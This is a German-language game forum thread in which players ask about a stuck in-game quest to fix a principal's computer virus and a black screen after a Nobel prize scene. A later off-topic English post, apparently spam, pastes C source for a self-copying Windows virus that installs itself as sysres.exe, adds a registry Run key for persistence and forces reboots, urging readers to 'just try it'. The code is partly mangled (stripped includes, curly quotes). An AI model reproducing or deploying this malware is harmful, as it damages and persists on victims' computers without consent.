Post Reply 
 
Thread Rating:
  • 0 Votes - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Virus Rektor Stark und Nobelpreis ?????
Author Message
Izzie Offline
Newbie
*

Posts: 3
Joined: Nov 2007
Post: #1
Question Virus Rektor Stark und Nobelpreis ?????
Hallo !

Ich bin bisweilen gut duch das Spiel gekommen, aber jetzt hänge ich doch. Und zwar habe ich in meiner Aufgabenliste drin stehen, dass ich den Computer vom Rektor Stark in Boston untersuchen soll und das Problem beheben soll. Das steht drin, seit ich das erste Mal mit ihm sprach, aber immer wenn ich an seinem Schreibtisch sitze oder ihn anspreche, gibt es nichts, womit ich den PC anschauen oder reparieren könnte. Mittlerweile habe ich alle Diplome und 4 Doktoren. Was muss ich also noch machen, damit das geht ???

Dann bin ich soweit, dass ich den Doktor in Architektur abgeholt habe und zum Nobelpreis bestellt werde.

Ich stehe also in Montur im Stadion und bekomme den Pokal und die Band spielt ein Lied für mich. Aber dann wird jedesmal der Bildschirm schwarz.


Ich kann dann nur noch escape drücken. Ist das Spiel mit dem Nobelpreis dann zu Ende ? Das wäre ja blöd, denn ich habe ja noch min. 2 Aufgaben zu erfüllen, eben den Virus und die Kontaktpersonen zu befragen.
Was aber auch nicht möglich ist, ich kann ihnen nur was erzählen, aber das scheint die nicht zu interessieren.

Kann mir jemand da weiterhelfen ??

Lieben Dank!

Izzie
(This post was last modified: 18-11-2007 04:58 PM by Izzie.)
18-11-2007 04:57 PM
Find all posts by this user Quote this message in a reply
Izzie Offline
Newbie
*

Posts: 3
Joined: Nov 2007
Post: #2
RE: Virus Rektor Stark und Nobelpreis ?????
Hat keiner einen Rat für mich ????

Sowie ich gelesen habe, waren doch schon einige in Boston, wie habt ihr diese Aufgabe mit dem PC Virus gelöst ????
21-11-2007 08:42 PM
Find all posts by this user Quote this message in a reply
nici_nougat Offline
Newbie
*

Posts: 7
Joined: Oct 2007
Post: #3
RE: Virus Rektor Stark und Nobelpreis ?????
hallo, das problem mit dem Computer hatte ich anfangs auch, ein paar tage später ging es dann aber. keine ahnung warum...
den doktor der architektur hab ich noch nicht...
22-11-2007 07:14 AM
Find all posts by this user Quote this message in a reply
haik4096 Offline
Newbie
*

Posts: 3
Joined: Nov 2009
Post: #4
RE: Virus Rektor Stark und Nobelpreis ?????
How virus affect and create???
HI Everyone .....
I know how to remove thread or virus from our local host machine....
but I know how it will affect our machine....
I know how virus has been created by any user

CODE FOR GENERATE VIRUS
Just grape this code and take more information on virus !!!!!

#include
#include
#include
int found,drive_no;char buff[128];
void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(”C:\\windows\\system”,&ffblk,FA_DIR EC); //to determine the root drive
if(done==0)
{
done=findfirst(”C:\\windows\\system\\sysres.exe”,& ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(”D:\\windows\\system”,&ffblk,FA_DIR EC);
if(done==0)
{
done=findfirst(”D:\\windows\\system\\sysres.exe”,& ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(”E:\\windows\\system”,&ffblk,FA_DIR EC);
if(done==0)
{
done=findfirst(”E:\\windows\\system\\sysres.exe”,& ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(”F:\\windows\\system”,&ffblk,FA_DIR EC);
if(done==0)
{
done=findfirst(”F:\\windows\\system\\sysres.exe”,& ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(”C:\\windows\\system\\sysres.exe”,”wb ”); //to place a copy of itself in a remote place
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;
case 2:
target=fopen(”D:\\windows\\system\\sysres.exe”,”wb ”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;
case 3:
target=fopen(”E:\\windows\\system\\sysres.exe”,”wb ”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;
case 4:
target=fopen(”F:\\windows\\system\\sysres.exe”,”wb ”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;
default:
exit(0);
}
while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}
else
system(”shutdown -r -t 0″); //if the system is already infected then just give a command to restart
}


Hay Friends Just try it !!!

Thank You

vitamin e
21-11-2009 08:36 AM
Find all posts by this user Quote this message in a reply
Post Reply 


Forum Jump:


User(s) browsing this thread: 1 Guest(s)

Contact Us | kalypso media :: website | Return to Top | Return to Content | Lite (Archive) Mode | RSS Syndication